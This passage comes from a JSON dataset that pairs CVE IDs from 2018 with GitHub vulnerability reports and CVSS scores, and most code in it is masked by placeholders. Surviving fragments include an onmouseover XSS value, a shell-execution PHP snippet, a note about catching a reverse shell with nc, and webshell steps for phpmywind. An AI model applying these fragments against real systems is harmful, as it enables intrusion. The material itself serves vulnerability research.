  25982. "description": "phpmywind NUMBERTAG Code Execution3. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG and inject the code APITAG FILETAG NUMBERTAG then request URLTAG FILETAG FILETAG",
  25983. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25984. "severity": "HIGH",
  25985. "baseScore": 7.2,
  25986. "impactScore": 5.9,
  25987. "exploitabilityScore": 1.2
  25988. },
  25989. {
  25990. "CVE_ID": "CVE-2018-17134",
  25991. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/7",
  25992. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/7",
  25993. "Repo_new": "panghusec/exploit",
  25994. "Issue_Created_At": "2018-08-15T10:25:39Z",
  25995. "description": "phpmywind NUMBERTAG Code Execution4. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG and inject the code FILETAG FILETAG FILETAG $cfg_webpath fill in NUMBERTAG cfg_author fill in APITAG",
  25996. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25997. "severity": "HIGH",
  25998. "baseScore": 7.2,
  25999. "impactScore": 5.9,
  26000. "exploitabilityScore": 1.2
  26001. },
  26002. {
  26003. "CVE_ID": "CVE-2018-17142",
  26004. "Issue_Url_old": "https://github.com/golang/go/issues/27702",
  26005. "Issue_Url_new": "https://github.com/golang/go/issues/27702",
  26006. "Repo_new": "golang/go",
  26007. "Issue_Created_At": "2018-09-17T01:46:37Z",
  26008. "description": "PATHTAG APITAG panic caused by malformed data. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? go version APITAG linux/amd NUMBERTAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG",
  26009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26010. "severity": "HIGH",
  26011. "baseScore": 7.5,
  26012. "impactScore": 3.6,
  26013. "exploitabilityScore": 3.9
  26014. },
  26015. {
  26016. "CVE_ID": "CVE-2018-17143",
  26017. "Issue_Url_old": "https://github.com/golang/go/issues/27704",
  26018. "Issue_Url_new": "https://github.com/golang/go/issues/27704",
  26019. "Repo_new": "golang/go",
  26020. "Issue_Created_At": "2018-09-17T02:05:34Z",
  26021. "description": "PATHTAG panic: runtime error: invalid memory address or nil pointer dereference. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? go version APITAG linux/amd NUMBERTAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit. What did you see instead? ERRORTAG",
  26022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26023. "severity": "HIGH",
  26024. "baseScore": 7.5,
  26025. "impactScore": 3.6,
  26026. "exploitabilityScore": 3.9
  26027. },
  26028. {
  26029. "CVE_ID": "CVE-2018-17175",
  26030. "Issue_Url_old": "https://github.com/marshmallow-code/marshmallow/issues/772",
  26031. "Issue_Url_new": "https://github.com/marshmallow-code/marshmallow/issues/772",
  26032. "Repo_new": "marshmallow-code/marshmallow",
  26033. "Issue_Created_At": "2018-04-12T23:11:28Z",
  26034. "description": "Empty Only Treated as None. When the only parameter is an empty list/set, it causes all the fields to be de/serialized like None . The implementation of NUMBERTAG and NUMBERTAG are not in compliance with their respective docs. > only (_tuple_) \u2013 A list or tuple of fields to serialize. If None , all fields will be serialized. CODETAG This could create a security vulnerability if an application was dynamically generating the field set based on security role. A filter that was meant to hide everything would inadvertently show everything.",
  26035. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  26036. "severity": "MEDIUM",
  26037. "baseScore": 5.3,
  26038. "impactScore": 1.4,
  26039. "exploitabilityScore": 3.9
  26040. },
  26041. {
  26042. "CVE_ID": "CVE-2018-17229",
  26043. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/453",
  26044. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/453",
  26045. "Repo_new": "exiv2/exiv2",
  26046. "Issue_Created_At": "2018-09-17T14:18:53Z",
  26047. "description": "APITAG heap buffer overflow in APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master b6a8d NUMBERTAG APITAG URLTAG ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  26048. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26049. "severity": "MEDIUM",
  26050. "baseScore": 6.5,
  26051. "impactScore": 3.6,
  26052. "exploitabilityScore": 2.8
  26053. },
  26054. {
  26055. "CVE_ID": "CVE-2018-17230",
  26056. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/455",
  26057. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/455",
  26058. "Repo_new": "exiv2/exiv2",
  26059. "Issue_Created_At": "2018-09-17T14:18:56Z",
  26060. "description": "APITAG heap buffer overflow in APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master b6a8d NUMBERTAG APITAG URLTAG ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  26061. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26062. "severity": "MEDIUM",
  26063. "baseScore": 6.5,
  26064. "impactScore": 3.6,
  26065. "exploitabilityScore": 2.8
  26066. },
  26067. {
  26068. "CVE_ID": "CVE-2018-17232",
  26069. "Issue_Url_old": "https://github.com/docmarionum1/slack-archive-bot/issues/12",
  26070. "Issue_Url_new": "https://github.com/docmarionum1/slack-archive-bot/issues/12",
  26071. "Repo_new": "docmarionum1/slack-archive-bot",
  26072. "Issue_Created_At": "2018-09-19T19:37:02Z",
  26073. "description": "Fix security vulnerabilities NUMBERTAG SQL injection. When searching the archive user input is used directly to create an SQL query. This can be exploited to view all messages, including messages from private channels the user is not a member of. Potentially exploitable to gain Remote Code Execution (RCE) depending on the configuration of the server NUMBERTAG Information disclosure. If a user searches for a phrase that has been posted in a private channel the user is not a member of, the bot returns nothing rather than \"No results found\". This leaks to the user that the phrase has been said.",
  26074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26075. "severity": "CRITICAL",
  26076. "baseScore": 9.8,
  26077. "impactScore": 5.9,
  26078. "exploitabilityScore": 3.9
  26079. },
  26080. {
  26081. "CVE_ID": "CVE-2018-17282",
  26082. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/457",
  26083. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/457",
  26084. "Repo_new": "exiv2/exiv2",
  26085. "Issue_Created_At": "2018-09-20T14:54:34Z",
  26086. "description": "SEGV in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master NUMBERTAG b NUMBERTAG APITAG URLTAG gdb info: ERRORTAG Asan info: ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  26087. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26088. "severity": "MEDIUM",
  26089. "baseScore": 6.5,
  26090. "impactScore": 3.6,
  26091. "exploitabilityScore": 2.8
  26092. },
  26093. {
  26094. "CVE_ID": "CVE-2018-17283",
  26095. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/4",
  26096. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/4",
  26097. "Repo_new": "x-f1v3/forcve",
  26098. "Issue_Created_At": "2018-09-20T11:15:20Z",
  26099. "description": "Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection. Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn Firewall Analyzer NUMBERTAG Build NUMBERTAG has permission bypass Vulnerability which can lead to information disclosure and SQL injection Proof of Concept: Getting the apikey unauthorizedly: CODETAG Local site test: FILETAG Add the admin user by only using the apikey poc: ERRORTAG Local site test: FILETAG FILETAG Sql injection by only using the apikey poc: CODETAG FILETAG FILETAG",
  26100. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  26101. "severity": "HIGH",
  26102. "baseScore": 7.5,
  26103. "impactScore": 3.6,
  26104. "exploitabilityScore": 3.9
  26105. },
  26106. {
  26107. "CVE_ID": "CVE-2018-17292",
  26108. "Issue_Url_old": "https://github.com/WAVM/WAVM/issues/109",
  26109. "Issue_Url_new": "https://github.com/wavm/wavm/issues/109",
  26110. "Repo_new": "wavm/wavm",
  26111. "Issue_Created_At": "2018-09-16T09:05:30Z",
  26112. "description": "Mishandling input files with file length less than NUMBERTAG bytes (crash). During loading module ( URLTAG there is a missing check for cases where file bytes are less than NUMBERTAG bytes. This may crash wavm. For example, when the input only contains APITAG , APITAG reports ERRORTAG In another extreme case, when the input is empty string, it raises SIGSEGV .",
  26113. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26114. "severity": "MEDIUM",
  26115. "baseScore": 6.5,
  26116. "impactScore": 3.6,
  26117. "exploitabilityScore": 2.8
  26118. },
  26119. {
  26120. "CVE_ID": "CVE-2018-17293",
  26121. "Issue_Url_old": "https://github.com/WAVM/WAVM/issues/110",
  26122. "Issue_Url_new": "https://github.com/wavm/wavm/issues/110",
  26123. "Repo_new": "wavm/wavm",
  26124. "Issue_Created_At": "2018-09-16T11:40:56Z",
  26125. "description": "Unhandled runtime exception: APITAG (sigabrt). When executing APITAG , the vm may trigger a ERRORTAG as of NUMBERTAG e8b9. POCs: FILETAG FILETAG gdb output is like: ERRORTAG",
  26126. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26127. "severity": "HIGH",
  26128. "baseScore": 8.8,
  26129. "impactScore": 5.9,
  26130. "exploitabilityScore": 2.8
  26131. },
  26132. {
  26133. "CVE_ID": "CVE-2018-17294",
  26134. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/635",
  26135. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/635",
  26136. "Repo_new": "liblouis/liblouis",
  26137. "Issue_Created_At": "2018-09-01T02:43:25Z",
  26138. "description": "APITAG stack buffer overflow at APITAG APITAG may suffer from a stack buffer overflow on a stack variable inbuf defined in APITAG . Relevant files are available here URLTAG . Command lines to trigger the crashes: CODETAG A sample ASAN output is like: ERRORTAG",
  26139. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26140. "severity": "MEDIUM",
  26141. "baseScore": 6.5,
  26142. "impactScore": 3.6,
  26143. "exploitabilityScore": 2.8
  26144. },
  26145. {
  26146. "CVE_ID": "CVE-2018-17297",
  26147. "Issue_Url_old": "https://github.com/looly/hutool/issues/162",
  26148. "Issue_Url_new": "https://github.com/dromara/hutool/issues/162",
  26149. "Repo_new": "dromara/hutool",
  26150. "Issue_Created_At": "2018-09-13T02:51:52Z",
  26151. "description": "zip_slip\u6f0f\u6d1e. \u5927\u5bb6\u597d, APITAG . \u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG FILETAG APITAG NUMBERTAG",
  26152. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  26153. "severity": "HIGH",
  26154. "baseScore": 7.5,
  26155. "impactScore": 3.6,
  26156. "exploitabilityScore": 3.9
  26157. },
  26158. {
  26159. "CVE_ID": "CVE-2018-17300",
  26160. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/4",
  26161. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/4",
  26162. "Repo_new": "cuppacms/cuppacms",
  26163. "Issue_Created_At": "2018-08-16T12:46:28Z",
  26164. "description": "XSS APITAG in APITAG Affected software: APITAG Type of vulnerability: XSS APITAG Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login to the cuppa cms. Step2:URL: URLTAG Go to the section menus and click on add item, and name them with malicious javascript. FILETAG Step3: Here the xss got executed. FILETAG",
  26165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26166. "severity": "MEDIUM",
  26167. "baseScore": 4.8,
  26168. "impactScore": 2.7,
  26169. "exploitabilityScore": 1.7
  26170. },
  26171. {
  26172. "CVE_ID": "CVE-2018-17301",
  26173. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1038",
  26174. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1038",
  26175. "Repo_new": "espocrm/espocrm",
  26176. "Issue_Created_At": "2018-09-13T07:43:03Z",
  26177. "description": "Non Persistent or Type II XSS in APITAG NUMBERTAG Affected software: APITAG NUMBERTAG Type of vulnerability: Non Persistent or Type II XSS Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable website, which reflects the attack back to the user\u2019s browser. The browser then executes the code because it came from a \"trusted\" server. Reflected XSS is also sometimes referred to as Non Persistent or Type II XSS. Proof of concept: Step1: Login to the CRM. Step2: In the search panel, use the malicious javascript and hit enter the code will get executed successfully. FILETAG FILETAG APITAG URLTAG",
  26178. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26179. "severity": "MEDIUM",
  26180. "baseScore": 5.4,
  26181. "impactScore": 2.7,
  26182. "exploitabilityScore": 2.3
  26183. },
  26184. {
  26185. "CVE_ID": "CVE-2018-17302",
  26186. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1039",
  26187. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1039",
  26188. "Repo_new": "espocrm/espocrm",
  26189. "Issue_Created_At": "2018-09-13T07:47:55Z",
  26190. "description": "Stored XSS in APITAG NUMBERTAG Affected software: APITAG NUMBERTAG Type of vulnerability: Stored XSS Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login into the CRM and in the mailbox use the link for entering the malicious javascript into it and save it as a draft message and whenever you open the draft msg the malicious javascript will get executed. FILETAG FILETAG APITAG URLTAG",
  26191. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26192. "severity": "MEDIUM",
  26193. "baseScore": 5.4,
  26194. "impactScore": 2.7,
  26195. "exploitabilityScore": 2.3
  26196. },
  26197. {
  26198. "CVE_ID": "CVE-2018-17317",
  26199. "Issue_Url_old": "https://github.com/PatatasFritas/PatataWifi/issues/1",
  26200. "Issue_Url_new": "https://github.com/patatasfritas/patatawifi/issues/1",
  26201. "Repo_new": "PatatasFritas/PatataWifi",
  26202. "Issue_Created_At": "2018-09-16T04:36:17Z",
  26203. "description": "Command to execute security issues. File FILETAG : APITAG NUMBERTAG output); //DEBUG SHOW ERRORS (da problemas cuando se usa para ejecutar un servicio) //LOG $rs = APITAG 'a'); fwrite($rs, date(\"Y m d H:i:s\").\" \".\"$bin_exec sh c $exec \"); if(is_array($output) and array_key_exists NUMBERTAG output)) { fwrite($rs, APITAG \"); } elseif (is_string($output)) { fwrite($rs, APITAG \"); } fclose($rs); return $output; } Command execution was formed. POC: POST FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG APITAG APITAG APITAG APITAG logged_in=yes; dotcom_user=ly NUMBERTAG has_recent_activity NUMBERTAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG",
  26204. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26205. "severity": "CRITICAL",
  26206. "baseScore": 9.8,
  26207. "impactScore": 5.9,
  26208. "exploitabilityScore": 3.9
  26209. },
  26210. {
  26211. "CVE_ID": "CVE-2018-17317",
  26212. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/276",
  26213. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/276",
  26214. "Repo_new": "xtr4nge/fruitywifi",
  26215. "Issue_Created_At": "2020-10-02T17:59:08Z",
  26216. "description": "Remote Command Execution in APITAG NUMBERTAG Issue Description: During the analysis of the software it was observed that the fruitywifi APITAG io_mode= PATHTAG NUMBERTAG Start a NC Listener on port NUMBERTAG Note : In order to bypass, we need to satisfy the qoutes then insert our payload and upon processing the request, you will be able to get the shell.",
  26217. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26218. "severity": "CRITICAL",
  26219. "baseScore": 9.8,
  26220. "impactScore": 5.9,
  26221. "exploitabilityScore": 3.9
  26222. },
  26223. {
  26224. "CVE_ID": "CVE-2018-17320",
  26225. "Issue_Url_old": "https://github.com/ucms/ucms/issues/1",
  26226. "Issue_Url_new": "https://github.com/ucms/ucms/issues/1",
  26227. "Repo_new": "ucms/ucms",
  26228. "Issue_Created_At": "2018-09-19T05:49:25Z",
  26229. "description": "ucms NUMBERTAG Storage XSS. Storage XSS in PATHTAG via minfo parameter FILETAG column name=>mname FILETAG skipping to FILETAG \uff0ctracking the four parameter. As the $_POST FILETAG as check for mname,the program checked it's length which should be larger than one and smaller than twenty.it is also should fit its APITAG shouldn't use the column which has been reserved by cms. FILETAG following the function of dbstr,it check the two punctuation FILETAG then join those parameter to the sql statement and put it into database for execution FILETAG FILETAG finally\uff0cprogram skip to FILETAG at line NUMBERTAG a query via ucms_moudle\uff0cat line NUMBERTAG print the payload we have already insert into table FILETAG FILETAG",
  26230. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26231. "severity": "MEDIUM",
  26232. "baseScore": 6.1,
  26233. "impactScore": 2.7,
  26234. "exploitabilityScore": 2.8
  26235. },
  26236. {
  26237. "CVE_ID": "CVE-2018-17332",
  26238. "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/2",
  26239. "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/2",
  26240. "Repo_new": "agambier/libsvg2",
  26241. "Issue_Created_At": "2018-09-12T00:46:15Z",
  26242. "description": "bug1: a DOS Dead Block BUG. POC: URLTAG descrtiption: Dead Block DOS,a malloc operation is done just in this Dead Block, which will lead to system's memory being wasted and finally may lead to the collapse of system. APITAG APITAG is always set to NUMBERTAG CODETAG If None of the branches which can affect the value of APITAG APITAG will return the same value which is delivered as a parameter. Unfortunately, a malloc operation is done just in this Dead Block, which will lead to system's memory being wasted and finally may lead to the collapse of system.",
  26243. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26244. "severity": "HIGH",
  26245. "baseScore": 7.5,
  26246. "impactScore": 3.6,
  26247. "exploitabilityScore": 3.9
  26248. },
  26249. {
  26250. "CVE_ID": "CVE-2018-17333",
  26251. "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/4",
  26252. "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/4",
  26253. "Repo_new": "agambier/libsvg2",
  26254. "Issue_Created_At": "2018-09-12T00:59:36Z",
  26255. "description": "bug NUMBERTAG another stack buffer overflow bug which may lead to RCE. ASAN: URLTAG POC: URLTAG EXP: URLTAG password:i5n2 Description: A sscanf operation without the check of string length, which may lead to stack over flow. When this lib is used to parse svg by a browser, RCE is possible. CODETAG APITAG This call of function doesn't check the string in APITAG which can lead to stack overflow! debug image: URLTAG",
  26256. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26257. "severity": "CRITICAL",
  26258. "baseScore": 9.8,
  26259. "impactScore": 5.9,
  26260. "exploitabilityScore": 3.9
  26261. },
  26262. {
  26263. "CVE_ID": "CVE-2018-17334",
  26264. "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/3",
  26265. "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/3",
  26266. "Repo_new": "agambier/libsvg2",
  26267. "Issue_Created_At": "2018-09-12T00:54:32Z",
  26268. "description": "bug2: a stack buffer overflow bug of parse WHICH may lead to RCE. POC: URLTAG ASAN: URLTAG Description: If APITAG can't hit the judge follow in a right range, the coptsize of strncpy may be too large, which will directly cause stack overflow. If the lib is used by a browser, RCE is possible! CODETAG APITAG APITAG pwndbg> p APITAG NUMBERTAG APITAG NUMBERTAG d pwndbg> p APITAG NUMBERTAG APITAG NUMBERTAG d NUMBERTAG saved $rbp and ret addr has been overwriteed, when bypassing the poc crash erro, $ip will be controlled. debug pic: URLTAG",
  26269. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26270. "severity": "CRITICAL",
  26271. "baseScore": 9.8,
  26272. "impactScore": 5.9,
  26273. "exploitabilityScore": 3.9
  26274. },
  26275. {
  26276. "CVE_ID": "CVE-2018-17336",
  26277. "Issue_Url_old": "https://github.com/storaged-project/udisks/issues/578",
  26278. "Issue_Url_new": "https://github.com/storaged-project/udisks/issues/578",
  26279. "Repo_new": "storaged-project/udisks",
  26280. "Issue_Created_At": "2018-09-16T04:52:50Z",
  26281. "description": "Malformed filesystem labels allows for a string format vulnerability. A malformed file system label can trigger a string format vulnerability in udisks. For example: CODETAG Crashes udisks2, and since the %n modifier allows for arbitrary memory manipulation this could pose a security risk, as udisksd runs root. ERRORTAG",
  26282. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  26283. "severity": "HIGH",
  26284. "baseScore": 7.8,
  26285. "impactScore": 5.9,
  26286. "exploitabilityScore": 1.8
  26287. },
  26288. {
  26289. "CVE_ID": "CVE-2018-17338",
  26290. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/29",
  26291. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/29",
  26292. "Repo_new": "kermitt2/pdfalto",
  26293. "Issue_Created_At": "2018-09-21T08:14:04Z",
  26294. "description": "Heap buffer overflow in function APITAG I used Clang NUMBERTAG and APITAG to build pdfalto URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
  26295. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26296. "severity": "HIGH",
  26297. "baseScore": 7.8,
  26298. "impactScore": 5.9,
  26299. "exploitabilityScore": 1.8
  26300. },
  26301. {
  26302. "CVE_ID": "CVE-2018-17341",
  26303. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/345",
  26304. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/345",
  26305. "Repo_new": "bigtreecms/bigtree-cms",
  26306. "Issue_Created_At": "2018-09-22T18:03:54Z",
  26307. "description": "Arbitrary file read. when we use APITAG or APITAG Rewrite\" routing in FILETAG line NUMBERTAG ERRORTAG althouch APITAG has been baned,we can use APITAG bypass in windows and the we can control the path in PATHTAG line NUMBERTAG APITAG and we do not need Authenticated in FILETAG line NUMBERTAG APITAG if APITAG we can bypass Authenticated payload: APITAG",
  26308. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26309. "severity": "HIGH",
  26310. "baseScore": 8.1,
  26311. "impactScore": 5.9,
  26312. "exploitabilityScore": 2.2
  26313. },
  26314. {
  26315. "CVE_ID": "CVE-2018-17361",
  26316. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/7",
  26317. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/7",
  26318. "Repo_new": "alterebro/weaselcms",
  26319. "Issue_Created_At": "2018-08-17T14:51:16Z",
  26320. "description": "I found a reflective XSS vulnerability. Mainly cause by using $_SERVER FILETAG FILETAG The payload here is: APITAG You should know that you have used this kind of method so many times. Actually, you can use APITAG to replace it. or use APITAG filter.",
  26321. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26322. "severity": "MEDIUM",
  26323. "baseScore": 6.1,
  26324. "impactScore": 2.7,
  26325. "exploitabilityScore": 2.8
  26326. },
  26327. {
  26328. "CVE_ID": "CVE-2018-17369",
  26329. "Issue_Url_old": "https://github.com/qzw1210/springboot_authority/issues/4",
  26330. "Issue_Url_new": "https://github.com/qzw1210/springboot_authority/issues/4",
  26331. "Repo_new": "qzw1210/springboot_authority",
  26332. "Issue_Created_At": "2018-09-12T08:09:09Z",
  26333. "description": "There are some stored xss via PATHTAG via PATHTAG APITAG name and description parameters has stored xss FILETAG FILETAG",
  26334. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26335. "severity": "MEDIUM",
  26336. "baseScore": 4.8,
  26337. "impactScore": 2.7,
  26338. "exploitabilityScore": 1.7
  26339. },
  26340. {
  26341. "CVE_ID": "CVE-2018-17420",
  26342. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/37",
  26343. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/37",
  26344. "Repo_new": "94fzb/zrlog",
  26345. "Issue_Created_At": "2018-09-18T15:43:11Z",
  26346. "description": "There is a sql injection in the article search box. APITAG CODETAG TABLE_NAME Field not verified",
  26347. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  26348. "severity": "HIGH",
  26349. "baseScore": 7.2,
  26350. "impactScore": 5.9,
  26351. "exploitabilityScore": 1.2
  26352. },
  26353. {
  26354. "CVE_ID": "CVE-2018-17421",
  26355. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/39",
  26356. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/39",
  26357. "Repo_new": "94fzb/zrlog",
  26358. "Issue_Created_At": "2018-09-18T16:01:05Z",
  26359. "description": "There is a stored XSS in the file upload area. After the file is uploaded correctly, \" APITAG \" will be displayed in the edit APITAG with the page display, the XSS purpose is achieved by modifying the display content. Poc click me aa\"onmouseover=\"alert NUMBERTAG s= \"click me\") The page is displayed as \" APITAG \"",
  26360. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26361. "severity": "MEDIUM",
  26362. "baseScore": 6.1,
  26363. "impactScore": 2.7,
  26364. "exploitabilityScore": 2.8
  26365. },
  26366. {
  26367. "CVE_ID": "CVE-2018-17422",
  26368. "Issue_Url_old": "https://github.com/dotCMS/core/issues/15286",
  26369. "Issue_Url_new": "https://github.com/dotcms/core/issues/15286",
  26370. "Repo_new": "dotcms/core",
  26371. "Issue_Created_At": "2018-09-14T07:04:46Z",
  26372. "description": "APITAG NUMBERTAG open redirect. Current Behavior APITAG NUMBERTAG allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a malformed URL e.g. CODETAG FILETAG Possible Solution limit the redirect target",
  26373. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26374. "severity": "MEDIUM",
  26375. "baseScore": 6.1,
  26376. "impactScore": 2.7,
  26377. "exploitabilityScore": 2.8
  26378. },
  26379. {
  26380. "CVE_ID": "CVE-2018-17423",
  26381. "Issue_Url_old": "https://github.com/e107inc/e107/issues/3414",
  26382. "Issue_Url_new": "https://github.com/e107inc/e107/issues/3414",
  26383. "Repo_new": "e107inc/e107",
  26384. "Issue_Created_At": "2018-09-03T02:35:20Z",
  26385. "description": "Stored XSS on update comments in NUMBERTAG Greetings, Hello e NUMBERTAG team, while i use this CMS, i found some security issues(maybe, i call it stored xss). Steps to reproduce Open web browser(i used Chrome). Log into e NUMBERTAG with admin. Switch to admin area, and check comments pending, select options 'edit'. In Comments area writes APITAG . Click FILETAG , and found box. FILETAG Impact In Step3, the attack must log in as admin, but the comment can be seen by all user. I hope it helps to improve e NUMBERTAG",
  26386. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26387. "severity": "MEDIUM",
  26388. "baseScore": 4.8,
  26389. "impactScore": 2.7,
  26390. "exploitabilityScore": 1.7
  26391. },
